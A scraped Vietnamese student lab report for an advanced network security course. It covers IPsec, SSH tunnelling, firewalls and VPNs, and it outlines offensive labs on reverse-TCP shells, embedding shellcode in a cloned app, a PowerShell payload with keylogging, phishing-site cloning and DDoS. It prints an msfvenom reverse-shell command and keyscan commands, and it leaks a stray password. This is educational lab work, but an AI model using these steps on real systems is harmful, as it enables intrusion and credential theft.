1. Trang chủ
  2. » Giáo Dục - Đào Tạo

(TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1 THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN

84 6 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Thiết Lập IPSec Connection Dùng Openswan
Tác giả Nguyễn Thị Ánh Nguyệt
Người hướng dẫn Đàm Minh Lịnh
Trường học Học viện công nghệ bưu chính viễn thông
Chuyên ngành An toàn mạng nâng cao
Thể loại báo cáo thực hành
Năm xuất bản 2022
Thành phố TPHCM
Định dạng
Số trang 84
Dung lượng 6,31 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Tìm hiểu cách nhúng mọt getshell vào tập tin ứng dụng bất kì và thực thi...34 Bước 1: Tìm source code từ git về...34 Bước 2: Chép tất cá shellcode vào file đã clone về từ git...34 Bước 3

Trang 1

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG KHOA CÔNG NGHỆ THÔNG TIN

BÁO CÁO THỰC HÀNH Môn: An toàn mạng nâng cao

TPHCM Tháng 2, 2022

Trang 2

Mục lục

LAB 1 : THIẾT LẬP IPSEC CONNECTION DÙNG OPENSWAN 8

1 Mục đích 8

2 Chuẩn bị 8

3 Thực hiện 9

Bước 1: Download openswan giải nén và cài đặt 10

Bước 2: Sinh khóa RSA trên cả 2 máy 11

Bước 3:Lấy leftrsasigkey trên máy cục bộ 11

Bước 4: Lấy rightrsasigkey trên máy từ xa 12

Bước 5: hiệu chỉnh file /etc/ipsec.còn trên cả 2 máy 12

Bước 6: Định nghĩa gateway 12

Bước 7 : Khởi động lại openswan trên cả 2 máy 13

Bước 8 : Khởi động lại kết nối trên cả 2 máy 13

Bước 9 : Sử dụng wireshark để kiểm tra 14

LAB 2 : THỰC HIỆN AN TOÀN CHO MỘT KẾT NỐI QUẢN TRỊ TỪ XA nguyet Aa1234567814 I Chuẩn bị: 14

II Thực hiện 14

Bước 1: Cài đặt MySQL server 14

Bước 2: Khởi động dịch vụ mysql server 14

Bước 3: Đăng nhập vào mysql server 14

Bước 4: Tạo một user, tự đặt một username và password 15

Bước 5: Tạo một cơ sở dữ liệu có tên là saigondb 15

Bước 6: Thiết lập quyền truy xuất cho user đã tạo 15

Bước 7: Xem cơ sở dữ liệu bằng lệnh show databases 15

Bước 8: Đăng xuất khỏi mysql và mở telnet service 16

Bước 9: Dùng máy thật của người quản trị cấu hình 1 kết nối Putty đến MySQL server , cần xác định địa chỉ IP củ máy chạy MySQL 16

Trang 3

Bước 10: Mở wireshark để tiến hành bắt gói tin 17

Bước 11: Thực hiện đăng nhập từ xa vào Linux server và tiến hành đăng nhập vào cơ sở dữ liệu bằng username 18

Bước 12: Phân tích gói tin bắt được 18

III Remote Access dung SSH 18

Bước 1: Mở putty cấu hình tùy chọn SSH và thực hiện lại kết nối đăng nhập như bước 11 18

Bước 2: Cài đặt openSSH server trên máy chạy server 20

Bước 3: Cấu hình file /etc/ssh/sshd_config 20

Bước 4: Khởi động lại ssh 20

Bước 5: Thực hiện một kết nối từ một máy Ubuntu đến máy chạy ssh server đã cài đặt ở trên 20

Bước 7: Thực hiện ssh <user>@<IP> -p53 21

Bước 7: Cấu hình forwarding port giữa port 3307 và 53 21

Bước 8: Thực hiện nc <ip address> 3307 trên máy người quản trị 22

Bước 9: Cấu hình port forwarding để kết nối mysql server qua ssh 22

Bước 10: Hủy forwarding ở bước 7 và thực hiện lại bước 9 23

Bước 11 : Thực hiên nc localhost 3307 23

Bước 12: Trên máy người quản trị thưc hiện port forwarding đến mysql server 24

Bước 13: Thực hiện kết nối đến mysql server từ máy người quản trị 24

Bước 14: Thực hiện đăng nhập mysql với username đã tạo ở phần 1 và tiến hành vài thao tác quản trị 24 Bước 15: Cài SSH server trên máy người quản trị và thực hiện một remote forwarding từ mysql port 3306 đến remote port 2001 của máy người quản trị 26

Bước 16: Thực hiện kết nối từ máy người quản trị 26

Bước 17: thực hiên kết nối đến mysql server từ máy người quản trị bằng navicat 26

LAB 3: THỰC HIỆN REVERSE TCP ĐỂ LẤY SHELL 29

1 Mục đích 29

2 Chuẩn bị và công cụ 29

Bước 1: Tiến hành lấy shell bằng câu lệnh 29

Bước 2: Chép shell vào file shell.c 30

Bước 3: Biên dịch shell.c thành shell 30

Bước 4: Thực thi shell 30

Bước 5: Mở handler bằng netcat 30

Bước 6: Tiến hành lấy shellcode bằng câu lệnh sau đó lưu vào file getshell.c 30

Bước 7: Biên dịch getshell.c thành getshell 31

Trang 4

Bước 8: Mở handler bằng netcat 31

Bước 9: Chép getshell.c vào máy victim 31

Bước 10: Biên dịch và thực thi getshell 32

Bước 11: Quay lại máy attack , đã có kết nối từ máy victim và thực hiện chép file tcp_reverse.txt lên máy victim 32

Bước 12: Quay lại máy victim và đã có file tcp_reverse.txt 33

3 Tìm hiểu cách nhúng mọt getshell vào tập tin ứng dụng bất kì và thực thi 34

Bước 1: Tìm source code từ git về 34

Bước 2: Chép tất cá shellcode vào file đã clone về từ git 34

Bước 3: Tiến hành thực thi trên máy victim 35

Bước 4: Mở handler bằng netcat trên máy attack và đã có kết nối 35

LAB 4 : THỰC HIỆN TẤN CÔNG SOCIAL ENGINEERING THƯỜNG DÙNG TRONG APT 36

Mô hình 36

1 Cài mã độc tấn công Social Engineering 36

Bước 1: Chọn Social-Engineering Attacks Sau đó chọn Powershell Attack Vectors 36

Bước 2: Copy file virus ra ngoài desktop đổi đuôi txt thanhg bat 38

Bước 3: Trên máy victim tiến hành chạy fike virus 38

Bước 4: Trên máy attacker tiến hành lấy thông tin từ máy victim bằng câu lệnh sessions -i 38

2 Demo tấn công bằng cách clone 1 link giả mạo 39

Bước 1:Khởi động setoolkit để dùng công cụ Social-Engineering Attacks 40

Chọn mục Website Attack Vectors 40

Bước 2: Chọn mục Credential Havrester Attack Method 40

Bước 3: Chọn mục site cloner 40

Bước 4: Nhập địa chỉ IP của máy attack 41

LAB 5: THIẾT KẾ MÔ HÌNH MẠNG DOANH NGHIỆP 43

1 Mô hình 43

2 Cấu hình 43

Bước 1: Cấu hình hostname và DNS server 45

Bước 2: Cấu hình Time server 45

Bước 3: Cấu hình WAN interface với IP Address:192.168.1.19/24 46

Bước 4: Cấu hình LAN Inteface 46

Bước 5: Đặt password cho tài khoản admin 47

3 Cấu hình NAT Firewall: 48

Trang 5

3.1 NAT để các PC trong LAN kết nối internet 48

3.2 NAT để đưa Webserevr lên internet 49

4 Cấu hình Ruler Firewall và kiểm tra: 52

4.1 Cho phép PC từ internet kết nối vào webserver trên DMZ 52

4.2 Không cho máy từ WAN kết nối vào máy máy trên LAN 53

4.3 Không cho các PC từ DMZ kết nối vào PC trên LAN 55

LAB 6 : CONFIG ASA BACSIC 57

Yêu cầu: 57

1 Cấu hình thông tin trên các cổng của FW 58

2 Cấu hình định tuyến 59

3 Cấu hình SSH trên FW 59

4 Cấu hình static NAT và ACL để cho từ bên ngoài có thể truy cập dịch vụ Remote Desktop trên vùng DMZ 60

5 Cấu hình PAT để cho phép người dùng từ inside có thể truy cập internet 63

LAB 7: IPSEC VPN SITE TO SITE 64

1 Mô tả 65

2 Cấu hình 65

2.1 Cấu hình trên router SAIGON 65

2.2 Cấu hình trên router VUNGTAU 66

3 Kiểm tra 67

LAB 8 TẤN CÔNG DDOS BẰNG SYNFLOOD VÀ HPING3 70

1 Tấn công ddos bằng synflood 70

Bước 1 : Kiểm tra port 445 của máy nạn nhân có mở không 70

Bước 2 : Tiến hành giả lập máy ảo với địa chỉ 192.168.0.1 để tấn công máy nạn nhân với địa chỉ 192.168.36.142 71

Bước 3: Mở wireshark và theo dõi 71

2 Tấn công với hping 3 72

3 Tấn công ddos bằng botnet: 74

Bước 1: Cấu hình file server.py trên máy server 74

Bước 2: Cấu hình file client.py trên máy client 77

Bước 3 : Thực thi file server.py trên máy server 80

Bước 4: Thực thi file client.py trên máy client 80

Bước 5: Kiểm tra đã có kết nối trên máy attack 80

Bước 6: Tấn công đến máy nạn nhân 80

Trang 6

Bước 7 : Mở taskmanager trên máy nạn nhân và theo dõi 81

Bước 8: Mở wireshark trên máy nạn nhân và theo dõi 81

Mục lục hình ảnh Hình 1 Thông tin máy cục bộ 10

Hình 2 Thông tin máy từ xa 10

Hình 3 Download openswan và giải nén 11

Hình 4 Cài đặt openswan 11

Hình 5 Thực hiện sinh khóa trên cả 2 máy 12

Hình 6 Lấu leftrsasigkey trên máy cục bộ 12

Hình 7 Lấy rightrsasigkey trên máy từ xa 12

Hình 8 File ipsec.conf trên máy cục bộ 13

Hình 9 Thông tin ipsec.conf trên máy từ xa 13

Hình 10 Định nghĩa default getway trên máy cục bộ 13

Hình 11 Định nghĩa getway trên máy từ xa 13

Hình 12 Khởi động lại openswan trên cả 2 máy 14

Hình 13.Khởi động lại kết nối trên cả 2 máy 14

Hình 14 Thông tin gói tin bắt được từ máy cục bộ 15

Hình 15.Thông tin gói tin bắt được từ máy tư xa 15

Hình 16 Tạo một user mới trên máy mysql server 16

Hình 17 Tạo một cơ sở dữ liệu saigondb 16

Hình 18.Thiết lập quyền truy xuất cho user nguyet đã tạo 16

Hình 19 Xem cơ sở dữ liệu bằng lệnh show 16

Hình 20.Khởi động dịch vụ telnet 17

Hình 21 Dùng máy thật tọa một kết nối putty đến mysql server 17

Hình 22.Kết nối thành công và thiwcj hiện vài thao tác quản trị 18

Hình 23.Mở wireshark và xem xét, gói tin telnet 18

Hình 24 Đăng nhập từ xa vào linux server và đăng nhập vào cơ sỏ dữ liệu bằng username 19

Hình 25.Mở putty và tiến hành kết nối ssh port 22 20

Hình 26.Kết quả kết nối bị chặn 20

Hình 27.Sửa file cấu hình sshd_config 21

Hình 28 Thực hiện kết nối đến máy chạy ssh server và kết quả bị chặn 21

Hình 29 Thực hiện ssh đến máy ssh server với port 53 22

Hình 30 Cấu hình forwading giữa port 3307 và 53 22

Hình 31 Thực hiện nc đến máy server 23

Hình 32.Cấu hình port forwarding để kết nối đến mysql server 23

Hình 33.Thực hiện lại port forwarding 24

Hình 34.Thực hiện nc localhost 3307 từ máy người quản trị 24

Hình 35.Thực hiện port forwarding đến mysql server với port 53 25

Hình 36.Thông tin gói tin bắt được từ wireshark 25

Hình 37 Thực hiện tiến hành đăng nhập vào mysql 26

Trang 7

Hình 38 Thực hiện và thực hiện một remote forwarding từ mysql port 3306 đến remote port 2001 của

máy người quản trị 27

Hình 39 Thực hiện kết nối từ máy người quản trị 27

Hình 40 Thông tin đăng nhập vào navicat 28

Hình 41.Thực hiện xem cơ sở dữ liệu trên navicat 29

Hình 42 Lấy shellcode bằng câu lệnh 30

Hình 43.File shell.c 31

Hình 44.Biên dịch shell.c 31

Hình 45.Thực thi shell trên máy attack 31

Hình 46 Mở handler trên máy attack 31

Hình 47.Lấy shellcode trên máy attack 32

Hình 48.Biên dịch shellcode đã lấy ở trên 32

Hình 49 Chép shellcode lên máy victim 33

Hình 50.Biên dịch và thực thi shellcode trên máy victim 33

Hình 51.Kiểm tra kết nối và chép file lên máy victim 34

Hình 52.Kết quả file chép từ attack lên victim đã có 35

Hình 53 Source code một ứng dung trên git 35

Hình 54 Chép shellcode vào ứng dụng đã clone về 36

Hình 55 Tiến hành thực thi ứng dụng đã nhúng shellcode trên máy vitcim 36

Hình 56 Mở handler trên máy attack và đã có kết nối 37

Hình 57 Chọn Powershell Attack Vectors 38

Hình 58.Powershell Alphanumeric Shellcode Injector 38

Hình 59 Lấy thông tin từ máy nạn nhân 39

Hình 60 Lệnh sysinfo 40

Hình 61 Chọn Website Attack Vectors 41

Hình 62.Chọn Credential Havrester Attack 41

Hình 63.Chọn site cloner 41

Hình 64 Nhập IP máy attacker 42

Hình 65 Thông tin lấy được từ máy victim 42

Hình 66 Khi máy nạn nhân đăng nhập vào website giả mạo, máy attack có thể lấy được username và pasword 43

Hình 67 Mô hình mạng doanh nghệp 44

Hình 68.Cấu hình firewall pfsense 45

Hình 69 Kiểm tra cấu hình 45

Hình 70 Cấu hình hostname và DNS server 46

Hình 71 Cấu hình Time server 46

Hình 72 Cấu hình WAN interface 47

Hình 73 Cấu hình LAN interface 47

Hình 74 Cấu hình password 48

Hình 75 Đăng nhập vào pfsense 48

Hình 76 Giao diện khi đã cấu hình xong 49

Hình 77 Đặt default getway cho máy trong LAN 49

Hình 78 Thực hiện NAT outbound 50

Hình 79 Kiểm tra xem LAN đã vào được internet chưa 50

Trang 8

Hình 80 Webserver Apache trên DMZ 51

Hình 81 Thực hiện Portforward 52

Hình 82 Truy cập webserver trên WAN 53

Hình 83 Rules cho phép PC từ internet kết nối vào webserver trên DMZ 53

Hình 84 Truy cập webserver bằng IP WAN 54

Hình 85 Rules không cho máy từ WAN kết nối vào máy máy trên LAN 55

Hình 86 Tiến hành kiểm tra 56

Hình 87 Rules không cho các PC từ DMZ kết nối vào PC trên LAN 57

Hình 88 Tiến hành kiểm tra 58

Hình 89 Mô hình ASA 59

Hình 90 Thông tin cấu hình trên cổng inside 59

Hình 91 Thông tin cấu hình trên cổng DMZ 59

Hình 92 Thông tin cấu hình trên cổng outside 60

Hình 93 Thông tin cấu hình static route trên FW 60

Hình 94 Thông tin cấu hình icmp trên FW 60

Hình 95 Thông tin cấu hình SSH trên FW 60

Hình 96 Kết quả SSH vào FW trên ( PC 192.168.2.10) 61

Hình 97 Thông tin cấu hình object network 61

Hình 98 Thông tin cấu hình object service 61

Hình 99 Thông tin cấu hình NAT và ACL cho phép truy cập outside vào DMZ 61

Hình 100 Thông tin cổng outside 62

Hình 101 kết quả remote desktop vào PC 192.168.10.10 64

Hình 102 Kết quả truy cập dịch vụ remote desktop từ PC ngoài vùng outside 64

Hình 103 Thông tin cấu hình PAT cho phép inside truy cập internet 64

Hình 104 Kết quả truy cập internet từ PC (192.168.2.10) (inside) 65

Hình 105 Kết quả ping từ PC ( 192.168.2.10 inside) đến PC (192.168.10.10 DMZ) 65

Hình 106 Mô hình thực hiện cấu hình IPSEC VPN SITE TO SITE 66

Hình 107 Thông tin cấu hình chính sách IKE trên router SAIGON 66

Hình 108 Thông tin key và peer trên router SAIGON 67

Hình 109 Thông tin cấu hình chính sách IPSEC trên router SAIGON 67

Hình 110 Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ trên souter SAIGON 67

Hình 111 Cấu hình crypto map trên router SAIGON 67

Hình 112 Thông tin cấu hình chính sách IKE trên router VUNGTAU 67

Hình 113 Thông tin key và peer trên router VUNGTAU 68

Hình 114 Thông tin cấu hình chính sách IPSEC trên router VUNGTAU 68

Hình 115 Xác định luồng dữu liệu được mã hóa hay bảo về trên router VUNGTAU 68

Hình 116 Thông tin cấu hình crypto map trên router VUNGTAU 68

Hình 117 Kết quả kết nối VPN 68

Hình 118 Trạng thái crypto isakmp sa 69

Hình 119 Trạng thái IPSEC sa 69

Hình 120 Số lượng kết nối 70

Hình 121 Thông tin crypto sesion detail 70

Hình 122 Thông tin máy nạn nhân 71

Hình 123 Trên máy tấn công kiểm tra port 445 của máy nạn nhân 71

Trang 9

Hình 124 Gói tin synlood ở 111 71

Hình 125 Dùng msfconsole để show các options 72

Hình 126 Gói tin bắt được khi tấn công 72

Hình 127 Biểu đồ hoạt động của cpu trên máy nạn nhân 73

Hình 128 Tấn công với câu lệnh hping3 74

Hình 129 Mở taskmanager trên máy nạn nhân và theo dõi bểu đồ 74

Hình 130 Mở wireshark và theo dõi gói tin 75

Hình 131 Thông tin máy server 75

Hình 132 Thông tin máy client 75

Hình 133 File server.py trên máy server 76

Hình 134 File client.py trên máy nạn nhân 79

Hình 135 Thực thi file server.py để tạo botnet 81

Hình 136 Thực thi file client.py để kết nối đến máy server 81

Hình 137 Kiểm tra kết nối trên máy server bằng lệnh list 81

Hình 138 Tấn công đến máy nạn nhân 81

Hình 139 Thông tin cpu trên máy nạn nhân khi bị tấn công 82

Hình 140 Thông tin cpu trên máy nạn nhân khi ngừng tấn công 82

Hình 141 Gói tin bắt được khi bị tấn công trên máy nạn nhân 83

LAB 1 : THIẾT LẬP IPSEC CONNECTION DÙNG OPENSWAN

Tạo lập được một kênh an toàn IPsec giữa hai máy tính sử dụng

Openswan Bắt dữ liệu để kiểm tra

Máy từ xa Ubuntu 14.04 192.168.35.166

Trang 10

Hai máy Ubuntu getway, giả sử 2 máy đều ở phía sau của một NAT hoặc có địa chỉ IP có thể định tuyến qua mạng công cộng, không có firewall Sẽ cài đặt openswan và ipsec- tools trên cả hai máy

Mỗi máy cần định rõ các thông tin Địa chỉ IP , tên đề getway có thể tự nhận dạng trong thiết lập IPsec Tên có dạng tên miền đứng trước kí tự @

Thực hiện trên cả 2 máy :

Hình 1 Thông tin máy cục bộ

Trang 11

Hình 2 Thông tin máy từ xa Bước 1: Download openswan giải nén và cài đặt

Hình 3 Download openswan và giải nén Cài đặt openswan

Trang 12

Hình 4 Cài đặt openswan Bước 2: Sinh khóa RSA trên cả 2 máy

Hình 5 Thực hiện sinh khóa trên cả 2 máy Bước 3:Lấy leftrsasigkey trên máy cục bộ

Hình 6 Lấu leftrsasigkey trên máy cục bộ

Trang 13

Bước 4: Lấy rightrsasigkey trên máy từ xa

Hình 7 Lấy rightrsasigkey trên máy từ xa Bước 5: hiệu chỉnh file /etc/ipsec.còn trên cả 2 máy

Hình 8 File ipsec.conf trên máy cục bộ

Hình 9 Thông tin ipsec.conf trên máy từ xa Bước 6: Định nghĩa gateway

Trên máy cục bộ

Hình 10 Định nghĩa default getway trên máy cục bộ

Trang 15

Bước 9 : Sử dụng wireshark để kiểm tra

Hình 14 Thông tin gói tin bắt được từ máy cục bộ

Hình 15 Thông tin gói tin bắt được từ máy tư xa

Aa12345678

Dùng môi trường ảo VMware

Trên máy server

Bước 1: Cài đặt MySQL server

Apt-get install mysql-server

Bước 2: Khởi động dịch vụ mysql

server Service mysql start

Bước 3: Đăng nhập vào mysql server

Mysql –u root –p

Trang 16

Bước 4: Tạo một user, tự đặt một username và password

Create user’nguyet’@’localhost’ identified by ‘abc’

Với username là ‘nguyet’ và password là ‘abc’

Hình 16 Tạo một user mới trên máy mysql server Bước 5: Tạo một cơ sở dữ liệu có tên là saigondb

Hình 17 Tạo một cơ sở dữ liệu saigondb Bước 6: Thiết lập quyền truy xuất cho user đã tạo

Hình 18 Thiết lập quyền truy xuất cho user nguyet đã tạo Bước 7: Xem cơ sở dữ liệu bằng lệnh show

databases show databases;

Hình 19 Xem cơ sở dữ liệu bằng lệnh show

Trang 17

Bước 8: Đăng xuất khỏi mysql và mở telnet service

Hình 20 Khởi động dịch vụ telnet Bước 9: Dùng máy thật của người quản trị cấu hình 1 kết nối Putty đến MySQL server , cần xác định địa chỉ IP củ máy chạy MySQL

Hình 21 Dùng máy thật tọa một kết nối putty đến mysql server

Trang 18

Hình 22 Kết nối thành công và thiwcj hiện vài thao tác quản trị Bước 10: Mở wireshark để tiến hành bắt gói tin

Hình 23 Mở wireshark và xem xét, gói tin telnet

Trang 19

Bước 11: Thực hiện đăng nhập từ xa vào Linux server và tiến hành đăng nhập vào cơ sở dữ liệu bằng username

Hình 24 Đăng nhập từ xa vào linux server và đăng nhập vào cơ sỏ dữ liệu bằng username Bước 12: Phân tích gói tin bắt được

Telnet không có mã hóa thông tin nên thông tin bắt được là ở dạng PlainText Điều này khiến Telnet dần như là một kết nối nguy hiểm và không khuyến khích dùng cho môi trường doanh nghiệp hay đòi hỏi bảo mật thông tin cao

III Remote Access dung SSH

Bước 1: Mở putty cấu hình tùy chọn SSH và thực hiện lại kết nối đăng nhập như bước 11 Kết nối không được phép vì port 22 chưa được cấu hình cho phép trong file sshd_config

Trang 20

Hình 25 Mở putty và tiến hành kết nối ssh port 22

Hình 26 Kết quả kết nối bị chặn

Trang 21

Bước 2: Cài đặt openSSH server trên máy chạy server

Bước 3: Cấu hình file /etc/ssh/sshd_config

Hình 27 Sửa file cấu hình sshd_config Bước 4: Khởi động lại ssh

Service ssh start

Bước 5: Thực hiện một kết nối từ một máy Ubuntu đến máy chạy ssh server đã cài đặt ở trên

Hình 28 Thực hiện kết nối đến máy chạy ssh server và kết quả bị chặn

Kết nối bị chặn do khi thực hiện ssh lab1@192.168.36.154 mặc định kết nối ở port 22 , trong khi máy chạy ssh server cho phép port 53 Do đó, mà khi sử dụng lệnh không chỉ định port, ta không thể kết nối ssh được

Trang 22

Bước 7: Thực hiện ssh <user>@<IP> -p53

Hình 29 Thực hiện ssh đến máy ssh server với port 53 Bước 7: Cấu hình forwarding port giữa port 3307 và 53

Hình 30 Cấu hình forwading giữa port 3307 và 53

Trang 23

Bước 8: Thực hiện nc <ip address> 3307 trên máy người quản trị

Hình 31 Thực hiện nc đến máy server Thực hiện kết nối port forwading 3307 được cài đặt để kết nối localhost -> không thể netcat từ máy của quản trị viên đến máy server ở port 3307

Bước 9: Cấu hình port forwarding để kết nối mysql server qua ssh

Hình 32 Cấu hình port forwarding để kết nối đến mysql server Ssh đăng mở port kết nối là 53 , do đó khi sử dụng câu lệnh trên ssh mặc định vào port 22 nên không thể kết nối

Trang 24

Bước 10: Hủy forwarding ở bước 7 và thực hiện lại bước 9

Hình 33 Thực hiện lại port forwarding

Bước 11 : Thực hiên nc localhost 3307

Hình 34 Thực hiện nc localhost 3307 từ máy người quản trị

Do port forwading 3307 đã bị huỷ trước đó, nên không thể thực hiện lệnh netcat localhost ở port 3307

Trang 25

Bước 12: Trên máy người quản trị thưc hiện port forwarding đến mysql server

Hình 35 Thực hiện port forwarding đến mysql server với port 53

Hình 36 Thông tin gói tin bắt được từ wireshark Bước 13: Thực hiện kết nối đến mysql server từ máy người quản trị

Nc localhost 3307

Bước 14: Thực hiện đăng nhập mysql với username đã tạo ở phần 1 và tiến hành vài thao tác quản trị

Trang 26

Hình 37 Thực hiện tiến hành đăng nhập vào mysql

Trang 27

Bước 15: Cài SSH server trên máy người quản trị và thực hiện một remote forwarding từ mysql port 3306 đến remote port 2001 của máy người quản trị

Hình 38 Thực hiện và thực hiện một remote forwarding từ mysql port 3306

đến remote port 2001 của máy người quản trị Bước 16: Thực hiện kết nối từ máy người quản trị

Hình 39 Thực hiện kết nối từ máy người quản trị Bước 17: thực hiên kết nối đến mysql server từ máy người quản trị bằng navicat

Cài đặt

Trang 28

# wget -q -O - http://www.navicat.com/download_linux_repo?lnx_repo=ubuntu | sudo tee /etc/apt/sources.list.d/navicatmonitor.list

# sudo apt-get update

# sudo apt-get install navicatmonitor

# sudo /etc/init.d/navicatmonitor start

Truy cập 192.168.36.166:3000

Tiến hành cài đặt những thông tin cần thiết

Hình 40 Thông tin đăng nhập vào navicat

Trang 29

Thực hiện xem database

Hình 41 Thực hiện xem cơ sở dữ liệu trên navicat

Trang 30

LAB 3: THỰC HIỆN REVERSE TCP ĐỂ LẤY SHELL

1 Mục đích

Thực hiện lấy shell một máy chủ qua mạng bằng cách dùng reverse TCP và shellcode

2 Chuẩn bị và công cụ

Bước 1: Tiến hành lấy shell bằng câu lệnh

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c platform linux arch x64

Thay đổi địa chỉ IP và PORT

Hình 42 Lấy shellcode bằng câu lệnh

Trang 31

Bước 2: Chép shell vào file shell.c

Hình 43 File shell.c Bước 3: Biên dịch shell.c thành shell

Hình 44 Biên dịch shell.c Bước 4: Thực thi shell

Hình 45 Thực thi shell trên máy attack Bước 5: Mở handler bằng netcat

Hình 46 Mở handler trên máy attack

Bước 6: Tiến hành lấy shellcode bằng câu lệnh sau đó lưu vào file getshell.c

Trang 32

Hình 47 Lấy shellcode trên máy attack Bước 7: Biên dịch getshell.c thành getshell

Hình 48 Biên dịch shellcode đã lấy ở trên Bước 8: Mở handler bằng netcat

Bước 9: Chép getshell.c vào máy victim

Trang 33

Hình 49 Chép shellcode lên máy victim Bước 10: Biên dịch và thực thi getshell

Hình 50 Biên dịch và thực thi shellcode trên máy victim

Bước 11: Quay lại máy attack , đã có kết nối từ máy victim và thực hiện chép file tcp_reverse.txt lên máy victim

Trang 34

Hình 51 Kiểm tra kết nối và chép file lên máy victim Bước 12: Quay lại máy victim và đã có file tcp_reverse.txt

Trang 35

Hình 52 Kết quả file chép từ attack lên victim đã có

3 Tìm hiểu cách nhúng mọt getshell vào tập tin ứng dụng bất kì và thực thi Bước 1: Tìm source code từ git về

Hình 53 Source code một ứng dung trên git Bước 2: Chép tất cá shellcode vào file đã clone về từ git

Trang 36

Hình 54 Chép shellcode vào ứng dụng đã clone về

Bước 3: Tiến hành thực thi trên máy victim

Hình 55 Tiến hành thực thi ứng dụng đã nhúng shellcode trên máy vitcim Bước 4: Mở handler bằng netcat trên máy attack và đã có kết nối

Trang 37

Hình 56 Mở handler trên máy attack và đã có kết nối

LAB 4 : THỰC HIỆN TẤN CÔNG SOCIAL ENGINEERING THƯỜNG DÙNG TRONG APT

Mô hình

1 Cài mã độc tấn công Social Engineering

Bước 1: Chọn Social-Engineering Attacks Sau đó chọn Powershell Attack Vectors

Trang 38

Hình 57 Chọn Powershell Attack Vectors Sau đó, tiếp tục chọn Powershell Alphanumeric Shellcode Injector Nhập địa chỉ IP của máy attacker để tiến hành tạo Virus tấn công Sau đó chọn yes

Hình 58 Powershell Alphanumeric Shellcode Injector

Trang 39

Bước 2: Copy file virus ra ngoài desktop đổi đuôi txt thanhg bat

Bước 3: Trên máy victim tiến hành chạy fike virus

Bước 4: Trên máy attacker tiến hành lấy thông tin từ máy victim bằng câu lệnh sessions -i

Hình 59 Lấy thông tin từ máy nạn nhân Lệnh sysinfo và ipcofig

Trang 40

Hình 60 Lệnh sysinfo Lệnh keyscan_start để tiến hành lấy dữ liệu từ máy victim

Lệnh keyscan_dump để lấy dữ liệu từ máy

victim Lệnh keyscan_stop để dừng lại

Lệnh screenshoot để chụp lại màn hình của máy victim

2 Demo tấn công bằng cách clone 1 link giả mạo

Ngày đăng: 03/12/2022, 08:59

HÌNH ẢNH LIÊN QUAN

Hình 5.Thực hiện sinh khóa trên cả 2 máy Bước 3:Lấy leftrsasigkey trên máy cục bộ - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 5. Thực hiện sinh khóa trên cả 2 máy Bước 3:Lấy leftrsasigkey trên máy cục bộ (Trang 12)
Hình 11. Định nghĩa getway trên máy từ xa Bước 7 : Khởi động lại openswan trên cả 2 máy - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 11. Định nghĩa getway trên máy từ xa Bước 7 : Khởi động lại openswan trên cả 2 máy (Trang 14)
Hình 12. Khởi động lại openswan trên cả 2 máy Bước 8 : Khởi động lại kết nối trên cả 2 máy - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 12. Khởi động lại openswan trên cả 2 máy Bước 8 : Khởi động lại kết nối trên cả 2 máy (Trang 14)
Hình 17. Tạo một cơ sở dữ liệu saigondb Bước 6: Thiết lập quyền truy xuất cho user đã tạo - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 17. Tạo một cơ sở dữ liệu saigondb Bước 6: Thiết lập quyền truy xuất cho user đã tạo (Trang 16)
Hình 36.Thơng tin gói tin bắt được từ wireshark Bước 13: Thực hiện kết nối đến mysql server từ máy người quản trị Nc localhost 3307 - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 36. Thơng tin gói tin bắt được từ wireshark Bước 13: Thực hiện kết nối đến mysql server từ máy người quản trị Nc localhost 3307 (Trang 25)
Hình 37. Thực hiện tiến hành đăng nhập vào mysql - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 37. Thực hiện tiến hành đăng nhập vào mysql (Trang 26)
Hình 38. Thực hiện và thực hiện một remote forwarding từ mysql port 3306 đến remote port 2001 của máy người quản trị - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 38. Thực hiện và thực hiện một remote forwarding từ mysql port 3306 đến remote port 2001 của máy người quản trị (Trang 27)
(hoặcdùngcácphươngtiệndạyhọckhácđểchiếuhình), -   Chia   HS   thànhcácnhóm   (từ   4   –   6   HS), giaonhiệmvụchocácnhóm: - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
ho ặcdùngcácphươngtiệndạyhọckhácđểchiếuhình), - Chia HS thànhcácnhóm (từ 4 – 6 HS), giaonhiệmvụchocácnhóm: (Trang 30)
Hình 43.File shell.c Bước 3: Biên dịch shell.c thành shell - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 43. File shell.c Bước 3: Biên dịch shell.c thành shell (Trang 31)
Hình 49. Chép shellcode lên máy victim Bước 10: Biên dịch và thực thi getshell - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
